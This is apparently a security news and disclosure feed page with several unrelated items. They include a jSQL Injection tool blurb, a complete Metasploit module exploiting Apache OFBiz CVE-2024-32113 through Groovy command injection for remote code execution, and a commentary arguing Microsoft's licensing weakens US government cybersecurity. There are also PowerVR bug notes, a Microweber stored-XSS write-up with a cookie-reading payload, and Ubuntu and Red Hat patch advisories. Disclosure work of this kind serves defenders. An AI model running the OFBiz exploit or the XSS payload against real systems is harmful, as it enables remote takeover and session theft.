jSQL Injection is a lightweight application used to find database information from a distant server. jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in various other distributions like Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux. This is the source code release.

jSQL Injection 0.99

Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulnerability. The vulnerable endpoint /webtools/control/forgotPassword allows an attacker to access the ProgramExport endpoint which in turn allows for remote code execution in the context of the user running the application.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Apache OFBiz Forgot Password Directory Traversal',        'Description' => %q{          Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulnerability. The vulnerable          endpoint /webtools/control/forgotPassword allows an attacker to access the ProgramExport endpoint which in          turn allows for remote code execution in the context of the user running the application.        },        'Author' => [          'Mr-xn', # PoC          'jheysel-r7' # module        ],        'References' => [          [ 'URL', 'https://github.com/Mr-xn/CVE-2024-32113'],          [ 'URL', 'https://xz.aliyun.com/t/14733?time__1311=mqmx9Qwx0WDsd5YK0%3Dai%3Dmd7KbxGupD&alichlgref=https%3A%2F%2Fgithub.com%2FMr-xn%2FCVE-2024-32113'],          [ 'CVE', '2024-32113']        ],        'License' => MSF_LICENSE,        'Platform' => %w[linux win],        'Privileged' => true, # You get a root session when exploiting a docker container though user level session on Windows.        'Arch' => [ ARCH_CMD ],        'Targets' => [          [            'Linux Command',            {              'Platform' => ['linux', 'unix'],              'Arch' => [ARCH_CMD],              'Type' => :unix_cmd            }          ],          [            'Windows Command',            {              'Platform' => ['win'],              'Arch' => [ARCH_CMD],              'Type' => :win_cmd            }          ],        ],        'Payload' => {          'BadChars' => "\x3a"        },        'DefaultTarget' => 0,        'DisclosureDate' => '2024-05-30',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ARTIFACTS_ON_DISK, ],          'Reliability' => [ REPEATABLE_SESSION, ]        },        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 8443        }      )    )  end  def send_cmd_injection(cmd)    data = "groovyProgram=throw+new+Exception('#{cmd}'.execute().text);"    send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/webtools/control/forgotPassword;/ProgramExport'),      'headers' => {        'HOST' => '127.0.0.1'      },      'method' => 'POST',      'data' => data    })  end  def check    echo_test_string = rand_text_alpha(8..12)    case target['Type']    when :win_cmd      test_payload = to_unicode_escape("cmd.exe /c echo #{echo_test_string}")    when :unix_cmd      test_payload = to_unicode_escape("echo #{echo_test_string}")    else      return CheckCode::Unknown('Please select a valid target')    end    res = send_cmd_injection(test_payload)    return CheckCode::Unknown('Target did not respond to check.') unless res    unless res.get_html_document&.xpath("//div[@class='content-messages errorMessage' and .//p[contains(text(), 'java.lang.Exception: #{echo_test_string}')]]")&.empty?      return CheckCode::Vulnerable('Tested remote code execution successfully')    end    CheckCode::Safe('Attempting to exploit vulnerability failed.')  end  def to_unicode_escape(str)    str.chars.map { |char| '\\u%04x' % char.ord }.join  end  def exploit    print_status('Attempting to exploit...')    res = ''    case target['Type']    when :win_cmd      res = send_cmd_injection(payload.encoded)    when :unix_cmd      res = send_cmd_injection(to_unicode_escape("sh -c $@|sh . echo #{payload.raw}"))    else      fail_with(Failure::BadConfig, 'Invalid target specified')    end    print_error('The target responded to the exploit attempt which is not expected. The exploit likely failed') if res  endend

Apache OFBiz Forgot Password Directory Traversal

Forcing Microsoft to compete fairly is the most important next step in building a better defense against foreign actors.

Steve Weber, Professor of the Graduate School, UC Berkeley School of Information

June 18, 2024

4 Min Read

Source: Michael Urmann via Alamy Stock Photo

COMMENTARY

This month, Microsoft president Brad Smith was confronted by the US House Committee on Homeland Security, in a hearing over the cybersecurity woes that have plagued the government as a direct result of the company's security shortcomings. These issues, however, don't just come down to insecure products. They're symptoms of a larger disease — a lapse in market and competition policy that has allowed Microsoft to dominate virtually all of the public sector technology market. And the US government's failure to properly diagnose the deeper cause puts us all at risk. 

Microsoft, by its own admission, is ground zero for state-sponsored hacking groups, and flaws in the company's software have been responsible for a huge proportion of cyber breaches affecting the US government in recent memory. Our country's cyber watchdogs — the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) and Cyber Safety Review Board (CSRB) — have spent considerable resources assessing these incidents and trying to assess and address Microsoft's vulnerabilities.

There's a fundamental problem with this process. The government is confusing symptoms — persistent hacks, breaches, and vulnerabilities — with an underlying disease: the lack of competition around cybersecurity. Microsoft has systematically exploited weaknesses in procurement processes to stifle competition and lock government customers into its insecure technology. That confusion ultimately leaves the government's tools to enhance competition on the sidelines, when those tools are the best remedy for cyber insecurity.

Microsoft holds an 85% market share of government collaboration and communications technology and now is awarded at least a quarter of its contracts without any meaningful competition. It's reached this position through a series of deliberate, anticompetitive moves the government has largely neglected. Stretched government procurement officers and chief information security officers (CISOs) are taking the path of least resistance. That's not their fault; it's a difficult consequence of their job. But Microsoft exploits this by making it expensive and difficult to run its software on a competitor's cloud, including charging a five-times premium just to use Word on Amazon's cloud instead of its own Azure cloud service. Microsoft bundles dozens of ancillary applications with its Office productivity apps in its licenses (including Access, Delve, Viva, and others), which stifles competition by linking basic, widely used services with less popular ones and pricing them as free.

The result? A software monoculture with a simple attack surface for the United States' adversaries with nearly a single point of failure: Microsoft. This is a major threat to national security. The potential harm is real and expensive. The US government spent more than $11.1 billion on cybersecurity in 2023, in large part trying to compensate for and respond to the Microsoft incidents that left it vulnerable to intrusion. 

Some lawmakers are ready to take action. Senator Ron Wyden recently drafted legislation that would require the government to set new standards for collaboration software in response to a CSRB report. It's a good step, but it solves only part of the problem. Even if the government can collaborate with other providers while using Microsoft's software, the company's licenses still make it very expensive, all at a major cost to the taxpayer.

**A Better Solution Is Needed**

The government must use all the tools at its disposal to create a more comprehensive solution that immediately targets the root cause of its cybersecurity woes: Microsoft's anticompetitive licensing restrictions. These tools include using the General Services Administration (GSA) to modify procurement processes as a means of bolstering national security. The GSA is responsible for providing agencies with cost-effective, high-quality products from diverse vendors, and the evidence is clear that Microsoft doesn't meet these standards. The GSA can take action by either negotiating better licensing conditions with the company or by looking at other vendors to help diversify the government's tech infrastructure. That would be a strong and timely step to set the stage for more comprehensive and sweeping competition policy action by the Federal Trade Commission (FTC) or the Department of Justice. It's also a step that wouldn't take years to implement — which is vital given the current and future costs of Microsoft's efforts to lock government customers into long-term contracts. The longer the government waits, the harder the lock-in will be to reverse.

It can't settle for identifying symptoms. Microsoft's licensing is responsible for a debilitating disease that has infected our government's tech infrastructure. Allowing major government contracts to be awarded to any one company — in this case, Microsoft — is only plausible if procurement officials believe they really don't have any other choice. But we already have the remedies necessary to level the playing field and make enterprise software vendors accountable for weak cybersecurity. Forcing Microsoft to compete fairly is the most important next step to build a better defense against foreign actors. We have multiple tools to create a level playing field. We just need to use them. 

**About the Author(s)**

Professor of the Graduate School, UC Berkeley School of Information

Steve Weber works at the intersection of technology markets, intellectual property regimes, and international politics He has published numerous books, including The Success of Open Source and, most recently, Bloc by Bloc: How to Build a Global Enterprise for the New Regional Order, and serves as Professor of the Graduate School, School of Information, UC Berkeley. He has worked with and received research funding from a number of technology firms, including Google and Microsoft.

The Software Licensing Disease Infecting Our Nation's Cybersecurity

PowerVR suffers from an out-of-bounds write of firmware addresses in PVRSRVRGXKickTA3DKM().

PowerVR Out-Of-Bounds Write

PowerVR suffers from an uninitialized memory disclosure and crash due to out-of-bounds reads in hwperf_host_%d stream.

PowerVR Uninitialized Memory Disclosure

Microweber version 2.0.15 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Stored XSS in Microweber# Date: 06/18/2024# Exploit Author: tmrswrr# Vendor Homepage: (https://microweber.me/)# Version: 2.0.15# Tested on: (http://active.demo.microweber.me/)## Vulnerability DescriptionA Stored Cross-Site Scripting (XSS) vulnerability has been identified in Microweber version 2.0.15. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.## Steps to Reproduce1. Log in to the application.2. Navigate to `Users > Edit Profile`.3. In the `First Name` field, input the following payload:    "><img src=x onerror=confirm(document.cookie)>4. Save the changes.5. Upon visiting any page where the modified user profile is displayed, an alert box will appear, indicating the execution of the injected script.

Microweber 2.0.15 Cross Site Scripting

Ubuntu Security Notice 6835-1 - It was discovered that Ghostscript did not properly restrict eexec seeds to those specified by the Type 1 Font Format standard when SAFER mode is used. An attacker could use this issue to bypass SAFER restrictions and cause unspecified impact. This issue only affected Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 23.10. Thomas Rinsma discovered that Ghostscript did not prevent changes to uniprint device argument strings after SAFER is activated, resulting in a format-string vulnerability. An attacker could possibly use this to execute arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
NotDashEscaped: You need gpg to verify this message

==========================================================================  
Ubuntu Security Notice USN-6835-1  
June 17, 2024

ghostscript vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in Ghostscript.

Software Description:  
- ghostscript: PostScript and PDF interpreter

Details:

It was discovered that Ghostscript did not properly restrict eexec  
seeds to those specified by the Type 1 Font Format standard when  
SAFER mode is used. An attacker could use this issue to bypass SAFER  
restrictions and cause unspecified impact. (CVE-2023-52722)  
This issue only affected Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 23.10.

Thomas Rinsma discovered that Ghostscript did not prevent changes to  
uniprint device argument strings after SAFER is activated, resulting  
in a format-string vulnerability. An attacker could possibly use this  
to execute arbitrary code. (CVE-2024-29510)

Zdenek Hutyra discovered that Ghostscript did not properly perform  
path reduction when validating paths. An attacker could use this to  
access file locations outside of those allowed by SAFER policy and  
possibly execute arbitrary code. (CVE-2024-33869)

Zdenek Hutyra discovered that Ghostscript did not properly check  
arguments when reducing paths. An attacker could use this to  
access file locations outside of those allowed by SAFER policy.  
(CVE-2024-33870)

Zdenek Hutyra discovered that the "Driver" parameter for Ghostscript's  
"opvp"/"oprp" device allowed specifying the name of an arbitrary dynamic  
library to load. An attacker could use this to execute arbitrary code.  
(CVE-2024-33871)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  ghostscript                     10.02.1~dfsg1-0ubuntu7.1  
  ghostscript-doc                 10.02.1~dfsg1-0ubuntu7.1

Ubuntu 23.10  
  ghostscript                     10.01.2~dfsg1-0ubuntu2.3  
  ghostscript-doc                 10.01.2~dfsg1-0ubuntu2.3  
  ghostscript-x                   10.01.2~dfsg1-0ubuntu2.3

Ubuntu 22.04 LTS  
  ghostscript                     9.55.0~dfsg1-0ubuntu5.7  
  ghostscript-doc                 9.55.0~dfsg1-0ubuntu5.7  
  ghostscript-x                   9.55.0~dfsg1-0ubuntu5.7

Ubuntu 20.04 LTS  
  ghostscript                     9.50~dfsg-5ubuntu4.12  
  ghostscript-doc                 9.50~dfsg-5ubuntu4.12  
  ghostscript-x                   9.50~dfsg-5ubuntu4.12

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6835-1  
  CVE-2023-52722, CVE-2024-29510, CVE-2024-33869, CVE-2024-33870,  
  CVE-2024-33871

Package Information:  
  https://launchpad.net/ubuntu/+source/ghostscript/10.02.1~dfsg1-0ubuntu7.1  
  https://launchpad.net/ubuntu/+source/ghostscript/10.01.2~dfsg1-0ubuntu2.3  
  https://launchpad.net/ubuntu/+source/ghostscript/9.55.0~dfsg1-0ubuntu5.7  
  https://launchpad.net/ubuntu/+source/ghostscript/9.50~dfsg-5ubuntu4.12  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEETB/nIDy9nvCSgAUj3gXQmO/Tr3wFAmZwxK4ACgkQ3gXQmO/T  
r3yOAQ/+NUTiKTAkI/XpceJpULY0tJiBZR37xhnxiKSuFoAQY5RrRuGxpC6sPXwi  
16Xoyo2gvDEfeaV4zn/jCfw4Lf4L1+JNbAOS1Yvnvg0Ags+b/bAUAlMV0E+7Jyap  
gVbd7T8c2oIMFFq6S78qi5Gl4kyHYiVAgxZNtJiMztTpF+qG2frcObLIW5JpzQZ3  
mZIRtoSAjyhKOoAfq2BXq/nuk0GzXu4wGEN2FEag6VRRW92Ti0rfdYjNYgcQ44Ii  
VTM5bYtvIjqI+uLbUEUiPQ91OZ4yg3K/pTRLnIVyoAo95Huqc6N+lZmXD97yokXj  
m4BU1iWSFBUS2kf/3aoNtkGqhIv/2sGYs3CNHBC23eE7IXsBbwaCpeF8Ogsx2eKe  
phpJMeCtvdTmq4+s0l5r4mwAKhHuvklQGwHe/5sDpJbZTW1qtdWmFzXaiKyHGDDw  
0nEyKkRKP0c3yC6I0Aht2gVk/pYiwhpVe5TGICl0lbRXO7DEEU5ns2t+C0xnMBz4  
cV2FE6rouRDJTlFPWtLmxT0BpHn+xBMLabEuPFJAlXRjy9dLKPrZVgkXe/9NROQm  
hUCuuKAHLKWK8rZC1c3T2DiE9dDQZs9KUZRKB0ZhZzLYC+pGu8DW9Ud6NDMB3LAO  
yDANPKeEG+09Ho2u4NbhbuLUMSzvNazZDpm2ZMi1vECul/nZ/ns=  
=WJrB  
-----END PGP SIGNATURE-----

Ubuntu Security Notice USN-6835-1

Red Hat Security Advisory 2024-3972-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service. Issues addressed include bypass and use-after-free vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3972.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: firefox security updateAdvisory ID:        RHSA-2024:3972-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3972Issue date:         2024-06-18Revision:           03CVE Names:          CVE-2024-5688====================================================================Summary: An update for firefox is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.12.0 ESR.Security Fix(es):* firefox: Use-after-free in networking (CVE-2024-5702)* firefox: Use-after-free in JavaScript object transplant (CVE-2024-5688)* firefox: External protocol handlers leaked by timing attack (CVE-2024-5690)* firefox:  Sandboxed iframes were able to bypass sandbox restrictions to open a new window (CVE-2024-5691)* firefox: Cross-Origin Image leak via Offscreen Canvas (CVE-2024-5693)* firefox: Memory Corruption in Text Fragments (CVE-2024-5696)* firefox: Memory safety bugs fixed in Firefox 127, Firefox ESR 115.12, and Thunderbird 115.12 (CVE-2024-5700) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-5688References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2291394https://bugzilla.redhat.com/show_bug.cgi?id=2291395https://bugzilla.redhat.com/show_bug.cgi?id=2291396https://bugzilla.redhat.com/show_bug.cgi?id=2291397https://bugzilla.redhat.com/show_bug.cgi?id=2291399https://bugzilla.redhat.com/show_bug.cgi?id=2291400https://bugzilla.redhat.com/show_bug.cgi?id=2291401

Red Hat Security Advisory 2024-3972-03

Red Hat Security Advisory 2024-3970-03 - An update for flatpak is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3970.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: flatpak security updateAdvisory ID:        RHSA-2024:3970-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3970Issue date:         2024-06-18Revision:           03CVE Names:          CVE-2024-32462====================================================================Summary: An update for flatpak is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Flatpak is a system for building, distributing, and running sandboxed desktop applications on Linux.Security Fix(es):* flatpak: sandbox escape via RequestBackground portal (CVE-2024-32462)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-32462References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2275981

Red Hat Security Advisory 2024-3970-03

Red Hat Security Advisory 2024-3969-03 - An update for flatpak is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3969.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: flatpak security updateAdvisory ID:        RHSA-2024:3969-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3969Issue date:         2024-06-18Revision:           03CVE Names:          CVE-2024-32462====================================================================Summary: An update for flatpak is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Flatpak is a system for building, distributing, and running sandboxed desktop applications on Linux.Security Fix(es):* flatpak: sandbox escape via RequestBackground portal (CVE-2024-32462)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-32462References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2275981

Latest News